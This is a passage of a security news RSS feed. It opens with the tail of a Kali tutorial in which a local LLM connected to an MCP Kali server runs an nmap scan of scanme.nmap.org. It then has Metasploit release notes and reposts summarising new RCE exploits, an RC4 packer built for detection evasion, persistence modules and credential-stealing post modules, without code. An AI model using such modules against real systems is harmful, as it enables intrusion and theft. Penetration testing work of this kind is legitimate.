<p>Let’s now setup 5ire to use Ollama.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-00-Kali-Menu.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-00-Kali-Menu.png" alt="Figure 01: Kali Menu">
</a>
</p>

<p>Open 5ire, then:</p>
<ul>
<li>5ire -&gt; Workspace -&gt; Providers -&gt; Ollama</li>
</ul>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-02-Providers-Menu.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-02-Providers-Menu.png" alt="Figure 02: Providers Menu">
</a>
</p>

<hr>
<p>Let’s toggle <code>Default</code> to Enable it</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-04-Providers-Default.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-04-Providers-Default.png" alt="Figure 03: Enabling Default Provider">
</a>
</p>

<hr>
<p>Select each of the Ollama models, and then make sure “Tools” and “Enabled” are both toggled to enable -&gt; Save.
Repeat for each of them.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-05-Providers-Enabling.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-05-Providers-Enabling.png" alt="Figure 04: Enabling Providers Options">
</a>
</p>

<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-08-Providers-Complete.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-08-Providers-Complete.png" alt="Figure 05: Providers Model Overview">
</a>
</p>

<p><em>If you wish, select a model to be the default one.</em></p>
<h3>Testing</h3>
<p>Now let’s test 5ire out!</p>
<ul>
<li>New Chat -&gt; Ollama</li>
</ul>
<blockquote>
<p>Hello world!</p>
</blockquote>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-11-Prompt-Generating.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-11-Prompt-Generating.png" alt="Figure 06: Hello World Processing">
</a>
</p>

<hr>
<p>Again, checking status:</p>
<pre><code class="language-console">$ ollama ps
NAME ID SIZE PROCESSOR CONTEXT UNTIL
qwen3:4b 359d7dd4bcda 3.5 GB 100% GPU 4096 2 minutes from now
$
</code></pre>
<hr>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-12-Prompt-Result.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-12-Prompt-Result.png" alt="Figure 07: Hello World Response">
</a>
</p>

<p>Looks to be working well! Time to setup the MCP.</p>
<h2>MCP Client (5ire)</h2>
<p>We can use 5ire’s GUI :</p>
<ul>
<li>5ire -&gt; Tools -&gt; Local</li>
</ul>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-13-Tools.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-13-Tools.png" alt="Figure 08: Adding MCP Tools">
</a>
</p>

<hr>
<p>Now to fill in the boxes:</p>
<ul>
<li>Name: <code>mcp-kali-server</code></li>
<li>Description: <code>MCP Kali Server</code></li>
<li>Approval Policy: …Up to you</li>
<li>Command: <code>/usr/bin/mcp-server</code></li>
</ul>
<p>Save</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-15-New-Tool.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-15-New-Tool.png" alt="Figure 09: MCP Tool Settings">
</a>
</p>

<hr>
<p>Do not forget to make sure to enable it!</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-16-Tools-Enabling.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-16-Tools-Enabling.png" alt="Figure 10: Enabling MCP Tools">
</a>
</p>

<hr>
<p>We can see what we now have on offer. <code>...</code> -&gt; Browse</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-18-Tools-Browse.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-18-Tools-Browse.png" alt="Figure 11: Browsing MCP Tools">
</a>
</p>

<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-19-Tools-Result.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-19-Tools-Result.png" alt="Figure 12: MCP Tools Options">
</a>
</p>

<h3>Testing</h3>
<ul>
<li>New Chat -&gt; Ollama</li>
</ul>
<blockquote>
<p>Can you please do a port scan on <code>scanme.nmap.org</code>, looking for TCP 80,443,21,22?</p>
</blockquote>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-22-Check-LLM-Tools-Support.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-22-Check-LLM-Tools-Support.png" alt="Figure 13: Check MCP LLM Support">
</a>
</p>

<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-23-Nmap-Prompt-Generating.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-23-Nmap-Prompt-Generating.png" alt="Figure 14: Nmap Scan Process">
</a>
</p>

<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-24-Nmap-Prompt-Thinking.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-24-Nmap-Prompt-Thinking.png" alt="Figure 15: Nmap Scan Scanning">
</a>
</p>

<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-26-Nmap-Prompt-Result-Stats.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-ollama-5ire/images/5ire-26-Nmap-Prompt-Result-Stats.png" alt="Figure 16: Nmap Scan Result">
</a>
</p>

<p>Wonderful!</p>
<h2>Recap</h2>
<p>As a recap:</p>
<ul>
<li>On our Kali local instance, we enabled our GPU for development.</li>
<li>We setup Ollama and grabbed a few LLMs, such as <code>qwen3:4b</code>.</li>
<li>Setup a MCP server, <code>MCP-Kali-Server</code>.</li>
<li>We installed a GUI interface, <code>5ire</code>.</li>
<li>We setup 5ire to use Ollama’s LLMs as well as MCP client to use mcp-kali-server.</li>
<li>We then used it all to-do a <code>nmap</code> port scan of <code>scanme.nmap.org</code> <strong>…all processed locally</strong>!</li>
</ul>
<p><em>We may be talking about AI, but AI was not used to write this!</em></p>
<hr>
<p><em>Find out more about advanced red teaming for AI environments at <a href="https://www.offsec.com/courses/osai/?utm_source=kali&amp;utm_medium=web&amp;utm_campaign=blog">OffSec.com</a>.</em></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 03/06/2026]]></title>
<description><![CDATA[Encoder exposed!Some of our releases add new ways in; this one adds new ways to stay in.   There are, of course, still new RCE toys in the box (Tactical RMM via Jinja2 SSTI and an unauthenticated MajorDoMo exploit). Still, the underlying theme is payloads: more control over how they are packaged ...]]></description>
<link>https://tsecurity.de/de/3331019/it-security-nachrichten/metasploit-wrap-up-03062026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3331019/it-security-nachrichten/metasploit-wrap-up-03062026/</guid>
<pubDate>Fri, 06 Mar 2026 19:50:40 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p></p><h1>Encoder exposed!</h1><p></p><p><span>Some of our releases add new ways in; this one adds new ways to stay in.   There are, of course, still new RCE toys in the box (Tactical RMM via Jinja2 SSTI and an unauthenticated MajorDoMo exploit). Still, the underlying theme is payloads: more control over how they are packaged and delivered, and fewer "why did it die instantly?" moments. We, like our community of module authors, grew tired of having to do everything by hand. You can now pick encoders (and tweak their options) directly for exploit and payload modules without extra glue code. Less plumbing, more choosing-the-right-badchar-killer-at-runtime.</span></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1b9cf1dad7cd02c5/69ab1cbdeed4c20008b3a2b2/2026-03-06-meme.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="2026-03-06-meme.png" asset-alt="2026-03-06-meme.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1b9cf1dad7cd02c5/69ab1cbdeed4c20008b3a2b2/2026-03-06-meme.png" data-sys-asset-uid="blt1b9cf1dad7cd02c5" data-sys-asset-filename="2026-03-06-meme.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="2026-03-06-meme.png" sys-style-type="display"></figure><p></p><h2>New module content (3)</h2><h3><span>Linux RC4 Packer with In-Memory Execution (x86)</span></h3><p><span>Author: Massimo Bertocchi</span></p><p><span>Type: Evasion</span></p><p><span>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20965"><span>#20965</span></a><span> contributed by </span><a href="https://github.com/litemars"><span>litemars</span></a></p><p><span>Path: </span><span>linux/x86/rc4_packer</span></p><p></p><p><span>Description: Adds a new module </span><span>evasion/linux/x86/rc4_packer</span><span> that encrypts the generated payload with RC4, prepends an optional sleep-based delay (nanosleep), and decrypts/executes the payload at runtime via a compact precompiled stub.</span></p><h3><span>Tactical RMM Jinja2 SSTI Remote Code Execution</span></h3><p><span>Authors: Gabriel Gomes and Valentin Lobstein </span><a href="mailto:chocapikk@leakix.net"><span>chocapikk@leakix.net</span></a></p><p><span>Type: Exploit</span></p><p><span>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/21017"><span>#21017</span></a><span> contributed by </span><a href="https://github.com/Chocapikk"><span>Chocapikk</span></a></p><p><span>Path: </span><span>linux/http/tacticalrmm_ssti_rce_cve_2025_69516</span></p><p><span>AttackerKB reference: </span><a href="https://attackerkb.com/search?q=CVE-2025-69516&amp;referrer=blog"><span>CVE-2025-69516</span></a></p><p></p><p><span>Description: This adds an exploit module for CVE-2025-69516, a Jinja2 SSTI in Tactical RMM &lt; 1.4.0 where the reporting template preview endpoint evaluates user-controlled templates without sandboxing, enabling authenticated RCE. The module logs in via the Knox API, auto-detects the API host from </span><span>/env-config.js</span><span>, and exploits the template preview feature.</span></p><h3><span>MajorDoMo Remote Command Injection via cycle_execs Race Condition</span></h3><p><span>Author: Valentin Lobstein </span><a href="mailto:chocapikk@leakix.net"><span>chocapikk@leakix.net</span></a></p><p><span>Type: Exploit</span></p><p><span>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/21000"><span>#21000</span></a><span> contributed by </span><a href="https://github.com/Chocapikk"><span>Chocapikk</span></a></p><p><span>Path: </span><span>multi/http/majordomo_cmd_injection_rce</span></p><p><span>AttackerKB reference: </span><a href="https://attackerkb.com/search?q=CVE-2026-27175&amp;referrer=blog"><span>CVE-2026-27175</span></a></p><p></p><p><span>Description: Adds three exploit modules for MajorDoMo, an open-source home automation platform. All three vulnerabilities are unauthenticated.</span></p><h2>Enhancements and features (2)</h2><ul><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20852"><span>#20852</span></a><span> from </span><a href="https://github.com/dledda-r7"><span>dledda-r7</span></a><span> - This adds encoder options for exploit and payload modules. It allows the user to select the encoder and modify its options when using exploit or payload without the need of adding additional code into the module.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20987"><span>#20987</span></a><span> from </span><a href="https://github.com/sjanusz-r7"><span>sjanusz-r7</span></a><span> - Allows AS-REP and Kerberoast modules to be ran against a pre-existing LDAP session as well as RHOST values.</span></p></li></ul><h2>Bugs fixed (5)</h2><ul><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20740"><span>#20740</span></a><span> from </span><a href="https://github.com/Chocapikk"><span>Chocapikk</span></a><span> - This adds a new </span><span>SRVSSL</span><span> option to the </span><span>HttpServer</span><span> library, allowing SSL to be enabled for the HTTP server independently from the HTTP client.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20830"><span>#20830</span></a><span> from </span><a href="https://github.com/SilentSobs"><span>SilentSobs</span></a><span> - This fixes a portability issue in </span><span>Msf::Post::File.stat</span><span> where the code incorrectly assumed a GNU </span><span>stat</span><span> output format.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20940"><span>#20940</span></a><span> from </span><a href="https://github.com/g0tmi1k"><span>g0tmi1k</span></a><span> - Fixes an issue where the </span><span>&gt;</span><span> (file Redirect operator) causes the exploit to fail.  This updates the exploit to use </span><span>tee</span><span> to avoid that problematic operator and also increases debug verbosity, simplifies code, adds documentation, and adds support for fetch payloads to gain Linux Meterpreter sessions.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20946"><span>#20946</span></a><span> from </span><a href="https://github.com/g0tmi1k"><span>g0tmi1k</span></a><span> - Corrects issue where the revision value provided in the http requests can be  outside the subset of revision id/value/numbers; a revision value that is not an actual revision value may result in a failed exploit.  Also, cleaned up logic and increased debugging verbosity.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/21044"><span>#21044</span></a><span> from </span><a href="https://github.com/adfoster-r7"><span>adfoster-r7</span></a><span> - Fixes a crash when using </span><span>db_import</span><span> on a nessus with protocols other than </span><span>tcp</span><span> or </span><span>udp</span><span>.</span></p></li></ul><h2>Documentation</h2><p><span>You can find the latest Metasploit documentation on our docsite at </span><a href="https://docs.metasploit.com/"><span>docs.metasploit.com</span></a><span>.</span></p><h2>Get it</h2><p><span>As always, you can update to the latest Metasploit Framework with </span><span>msfupdate</span><span> and you can get more details on the changes since the last blog post from GitHub:</span></p><p></p><ul><li><p><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-02-26T16%3A14%3A35%2B01%3A00..2026-03-05T14%3A49%3A28Z%22"><span>Pull Requests 6.4.116...6.4.119</span></a></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.116...6.4.119"><span>Full diff 6.4.116...6.4.119</span></a></p></li></ul><p></p><p><span>If you are a </span><span>git</span><span> user, you can clone the </span><a href="https://github.com/rapid7/metasploit-framework"><span>Metasploit Framework repo</span></a><span> (master branch) for the latest. To install fresh without using git, you can use the open-source-only </span><a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers"><span>Nightly Installers</span></a><span> or the commercial edition </span><a href="https://www.rapid7.com/products/metasploit/download/"><span>Metasploit Pro</span></a></p><p></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Adds New Modules Targeting Linux RC4, BeyondTrust, and Registry Persistence]]></title>
<description><![CDATA[The latest Metasploit update, released on February 27, 2026, brings significant firepower to security professionals and penetration testers. The release introduces seven new modules, nine feature enhancements, and critical bug fixes. Standout additions include unauthenticated remote code executio...]]></description>
<link>https://tsecurity.de/de/3316419/it-security-nachrichten/metasploit-adds-new-modules-targeting-linux-rc4-beyondtrust-and-registry-persistence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3316419/it-security-nachrichten/metasploit-adds-new-modules-targeting-linux-rc4-beyondtrust-and-registry-persistence/</guid>
<pubDate>Sat, 28 Feb 2026 10:05:02 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The latest Metasploit update, released on February 27, 2026, brings significant firepower to security professionals and penetration testers. The release introduces seven new modules, nine feature enhancements, and critical bug fixes. Standout additions include unauthenticated remote code execution (RCE) exploits…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/metasploit-adds-new-modules-targeting-linux-rc4-beyondtrust-and-registry-persistence/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/metasploit-adds-new-modules-targeting-linux-rc4-beyondtrust-and-registry-persistence/">Metasploit Adds New Modules Targeting Linux RC4, BeyondTrust, and Registry Persistence</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Adds New Modules Targeting Linux RC4, BeyondTrust, and Registry Persistence]]></title>
<description><![CDATA[The latest Metasploit update, released on February 27, 2026, brings significant firepower to security professionals and penetration testers. The release introduces seven new modules, nine feature enhancements, and critical bug fixes. Standout additions include unauthenticated remote code executio...]]></description>
<link>https://tsecurity.de/de/3316397/it-security-nachrichten/metasploit-adds-new-modules-targeting-linux-rc4-beyondtrust-and-registry-persistence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3316397/it-security-nachrichten/metasploit-adds-new-modules-targeting-linux-rc4-beyondtrust-and-registry-persistence/</guid>
<pubDate>Sat, 28 Feb 2026 09:50:32 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The latest Metasploit update, released on February 27, 2026, brings significant firepower to security professionals and penetration testers. The release introduces seven new modules, nine feature enhancements, and critical bug fixes. Standout additions include unauthenticated remote code execution (RCE) exploits for Ollama, BeyondTrust, and Grandstream VoIP devices, alongside advanced evasion techniques for Linux environments. Critical […]</p>
<p>The post <a href="https://cybersecuritynews.com/metasploit-adds-new-modules-targeting-linux-rc4/">Metasploit Adds New Modules Targeting Linux RC4, BeyondTrust, and Registry Persistence</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Unveils Exploit Modules for Linux RC4 and BeyondTrust Vulnerabilities]]></title>
<description><![CDATA[Rapid7 has released a significant update to the Metasploit Framework, delivering powerful new exploit modules and critical vulnerability support. The February 2026 release equips security teams with advanced tools to test unauthenticated remote code execution (RCE) flaws, sophisticated evasion me...]]></description>
<link>https://tsecurity.de/de/3316344/it-security-nachrichten/metasploit-unveils-exploit-modules-for-linux-rc4-and-beyondtrust-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3316344/it-security-nachrichten/metasploit-unveils-exploit-modules-for-linux-rc4-and-beyondtrust-vulnerabilities/</guid>
<pubDate>Sat, 28 Feb 2026 09:05:29 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Rapid7 has released a significant update to the Metasploit Framework, delivering powerful new exploit modules and critical vulnerability support. The February 2026 release equips security teams with advanced tools to test unauthenticated remote code execution (RCE) flaws, sophisticated evasion methods, and new persistence techniques. Critical Exploit Modules Added Ollama Path Traversal RCE The standout addition […]</p>
<p>The post <a href="https://cyberpress.org/metasploit-unveils-exploit-modules-for-linux-rc4-and-beyondtrust-vulnerabilities/">Metasploit Unveils Exploit Modules for Linux RC4 and BeyondTrust Vulnerabilities</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 02/27/2026]]></title>
<description><![CDATA[No Prob-ollamaThis release brings some serious firepower with multiple new exploit modules and critical vulnerability support! The standout additions are the Ollama path traversal RCE (CVE-2024-37032), a sophisticated exploit chaining arbitrary file writes into unauthenticated root RCE, and the G...]]></description>
<link>https://tsecurity.de/de/3315804/it-security-nachrichten/metasploit-wrap-up-02272026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3315804/it-security-nachrichten/metasploit-wrap-up-02272026/</guid>
<pubDate>Fri, 27 Feb 2026 22:05:23 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>No Prob-ollama</h2><p><span>This release brings some serious firepower with multiple new exploit modules and critical vulnerability support! The standout additions are the Ollama path traversal RCE (CVE-2024-37032), a sophisticated exploit chaining arbitrary file writes into unauthenticated root RCE, and the Grandstream GXP1600 stack overflow (CVE-2026-2329), which targets VoIP devices with accompanying credential harvesting and SIP interception post-modules. </span></p><p></p><p><span>The BeyondTrust PRA/RS module got upgraded with support for the new CVE-2026-1731 command injection vulnerability along with legacy CVE support. On the evasion front, there's fresh ARM64 RC4 encryption support with sleep-based detection bypass. Classic vulnerability modules like Unreal IRCd and vsftpd backdoors got quality-of-life improvements with proper check methods and multiple exploitation targets. Several auxiliary scanners (LDAP ESC, GraphQL introspection) also received critical bugfix updates eliminating false positives and crashes.</span></p><p></p><h2>New module content (7)</h2><h3><span>Linux RC4 Packer with In-Memory Execution</span></h3><p><span>Author: Massimo Bertocchi</span></p><p><span>Type: Evasion</span></p><p><span>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20964"><span>#20964</span></a><span> contributed by </span><a href="https://github.com/litemars"><span>litemars</span></a></p><p><span>Path: </span><span>linux/aarch64/rc4_packer</span></p><p></p><p><span>Description: First Linux evasion module for arm64, a packer using rc4 encryption, in memory execution of the elf binary, and sleep evasion.</span></p><h3><span>BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution</span></h3><p><span>Authors: Harsh Jaiswal and Jonah Burgess (CryptoCat)</span></p><p><span>Type: Exploit</span></p><p><span>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20978"><span>#20978</span></a><span> contributed by </span><a href="https://github.com/jburgess-r7"><span>jburgess-r7</span></a></p><p><span>Path: </span><span>linux/http/beyondtrust_pra_rs_command_injection</span></p><p><span>AttackerKB reference: </span><a href="https://attackerkb.com/search?q=CVE-2026-1731&amp;referrer=blog"><span>CVE-2026-1731</span></a></p><p></p><p><span>Description: This adds a new module for unauthenticated command injection in BeyondTrust PRA/RS (CVE-2026-1731). This change also introduces a new library for BeyondTrust familiar helper functions; existing modules have been ported to use it.</span></p><h3><span>GrandStream GXP1600 Unauthenticated Remote Code Execution</span></h3><p><span>Author: sfewer-r7</span></p><p><span>Type: Exploit</span></p><p><span>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20983"><span>#20983</span></a><span> contributed by </span><a href="https://github.com/sfewer-r7"><span>sfewer-r7</span></a></p><p><span>Path: </span><span>linux/http/grandstream_gxp1600_unauth_rce</span></p><p><span>AttackerKB reference: </span><a href="https://attackerkb.com/search?q=CVE-2026-2329&amp;referrer=blog"><span>CVE-2026-2329</span></a></p><p></p><p><span>Description: Adds three new modules: one exploit and two post modules, all targeting the Grandstream GXP1600 series of VoIP devices.  The exploit module uses CVE-2026-2329 to gain a root session, and the post modules leverage that access to perform credential stealing and packet capture.</span></p><h3><span>Ollama Model Registry Path Traversal RCE</span></h3><p><span>Authors: Sagi Tzadik </span><a href="mailto:sagitz@wiz.io"><span>sagitz@wiz.io</span></a><span> and Valentin Lobstein </span><a href="mailto:chocapikk@leakix.net"><span>chocapikk@leakix.net</span></a></p><p><span>Type: Exploit</span></p><p><span>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/21006"><span>#21006</span></a><span> contributed by </span><a href="https://github.com/Chocapikk"><span>Chocapikk</span></a></p><p><span>Path: </span><span>linux/http/ollama_rce_cve_2024_37032</span></p><p><span>AttackerKB reference: </span><a href="https://attackerkb.com/search?q=CVE-2024-37032&amp;referrer=blog"><span>CVE-2024-37032</span></a></p><p></p><p><span>Description: This adds a new exploit module for Ollama (CVE-2024-37032). Ollama's pull mechanism accepts arbitrary path traversal sequences, allowing an attacker to load a rogue OCI registry and write arbitrary files. The exploit does this by writing </span><span>.so</span><span> files into the target, then forcing Ollama to spawn a new process where the malicious library is loaded.</span></p><h3><span>Linux WSL via Startup Folder Persistence</span></h3><p><span>Author: h00die</span></p><p><span>Type: Exploit</span></p><p><span>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20819"><span>#20819</span></a><span> contributed by </span><a href="https://github.com/h00die"><span>h00die</span></a></p><p><span>Path: </span><span>linux/persistence/wsl/startup_folder</span></p><p></p><p><span>Description: This adds a new persistence module for WSL that writes a payload to the user's startup folder. The module creates a persistence for Windows; however, the initial access needs to be in Linux.</span></p><h3><span>Windows Registry Active Setup Persistence</span></h3><p><span>Author: h00die</span></p><p><span>Type: Exploit</span></p><p><span>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20841"><span>#20841</span></a><span> contributed by </span><a href="https://github.com/h00die"><span>h00die</span></a></p><p><span>Path: </span><span>windows/persistence/registry_active_setup</span></p><p></p><p><span>Description: This adds new persistence for Windows, which uses the Windows feature Active Setup. The module abuse is used to launch our payload, with 2 caveats. 1) You downgrade from admin to user permissions, 2) it only launches the payload once per user.</span></p><h3><span>GrandStream GXP1600 proxy SIP traffic</span></h3><p><span>Author: sfewer-r7</span></p><p><span>Type: Post</span></p><p><span>Pull request: </span><a href="https://github.com/rapid7/metasploit-framework/pull/20983"><span>#20983</span></a><span> contributed by </span><a href="https://github.com/sfewer-r7"><span>sfewer-r7</span></a></p><p><span>Path: </span><span>linux/capture/grandstream_gxp1600_sip</span></p><p></p><p><span>Description: Adds three new modules: one exploit and two post modules, all targeting the Grandstream GXP1600 series of VoIP devices.  The exploit module uses CVE-2026-2329 to gain a root session, and the post modules leverage that access to perform credential stealing and packet capture.</span></p><h2>Enhancements and features (9)</h2><ul><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20859"><span>#20859</span></a><span> from </span><a href="https://github.com/dledda-r7"><span>dledda-r7</span></a><span> - Splits the </span><span>exe.rb</span><span> into separate, more consistent files. Each file responds to a combination of platform and architecture, offering a better granular approach.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20938"><span>#20938</span></a><span> from </span><a href="https://github.com/Chocapikk"><span>Chocapikk</span></a><span> - Improves the check method in the </span><span>beyondtrust_pra_rs_unauth_rrce</span><span> to properly detect older versions that are also vulnerable but report the version in a different way.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20950"><span>#20950</span></a><span> from </span><a href="https://github.com/g0tmi1k"><span>g0tmi1k</span></a><span> - Updates the </span><span>vsftp_234_backdoor</span><span> module to add shell and Meterpreter payloads, improve checking, and increase the output for better traoubleshooting.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20951"><span>#20951</span></a><span> from </span><a href="https://github.com/g0tmi1k"><span>g0tmi1k</span></a><span> - Moves default payload into </span><span>DefaultOptions</span><span> in Remote for Mac module. This makes it more consistent with other existing modules.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20952"><span>#20952</span></a><span> from </span><a href="https://github.com/g0tmi1k"><span>g0tmi1k</span></a><span> - Enhances the </span><span>unix/irc/unreal_ircd_3281_backdoor</span><span> module to increase payload options, including adding a native Meterpreter session, adds debugging logic inside the module, and more verbose output.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20988"><span>#20988</span></a><span> from </span><a href="https://github.com/adfoster-r7"><span>adfoster-r7</span></a><span> - Improved SolarWinds exploit module to automatically pick the correct SRVHOST value.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20992"><span>#20992</span></a><span> from </span><a href="https://github.com/adfoster-r7"><span>adfoster-r7</span></a><span> - Adds a check method to the ms17-010 scanner module to improve the metadata associated with automation workflows.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/21010"><span>#21010</span></a><span> from </span><a href="https://github.com/Nayeraneru"><span>Nayeraneru</span></a><span> - </span><span>This adds reporting for GitLab services.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/21014"><span>#21014</span></a><span> from </span><a href="https://github.com/adfoster-r7"><span>adfoster-r7</span></a><span> - Fixes a crash when running the ldap esc vulnerable cert finder against a target when LDAP binding fails.</span></p></li></ul><h2>Bugs fixed (1)</h2><ul><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/21012"><span>#21012</span></a><span> from </span><a href="https://github.com/adfoster-r7"><span>adfoster-r7</span></a><span> - Improves the GraphQL Introspection Scanner module to correctly handle invalid responses and false positives.</span></p></li></ul><h2>Documentation added (3)</h2><ul><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20832"><span>#20832</span></a><span> from </span><a href="https://github.com/DataExplorerX"><span>DataExplorerX</span></a><span> - Adds comprehensive documentation for the linux/samba/chain_reply module targeting CVE-2010-2063.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/20990"><span>#20990</span></a><span> from </span><a href="https://github.com/jheysel-r7"><span>jheysel-r7</span></a><span> - This adds and an AI Usage Policy to GSoC Ideas Page as requested by GSoC.</span></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/pull/21005"><span>#21005</span></a><span> from </span><a href="https://github.com/h00die"><span>h00die</span></a><span> - This adds example of GNU inetutils auth bypass module against a Synology NAS to existing documentation.</span></p></li></ul><p></p><p><span>You can always find more documentation on our docsite at </span><a href="https://docs.metasploit.com/"><span>docs.metasploit.com</span></a><span>.</span></p><h2>Get it</h2><p><span>As always, you can update to the latest Metasploit Framework with </span><span>msfupdate</span><span> and you can get more details on the changes since the last blog post from GitHub:</span></p><p></p><ul><li><p><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-02-19T09%3A16%3A01Z..2026-02-26T16%3A14%3A35%2B01%3A00%22"><span>Pull Requests 6.4.115...6.4.116</span></a></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.115...6.4.116"><span>Full diff 6.4.115...6.4.116</span></a></p></li></ul><p></p><p><span>If you are a </span><span>git</span><span> user, you can clone the </span><a href="https://github.com/rapid7/metasploit-framework"><span>Metasploit Framework repo</span></a><span> (master branch) for the latest. To install fresh without using git, you can use the open-source-only </span><a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers"><span>Nightly Installers</span></a><span> or the commercial edition </span><a 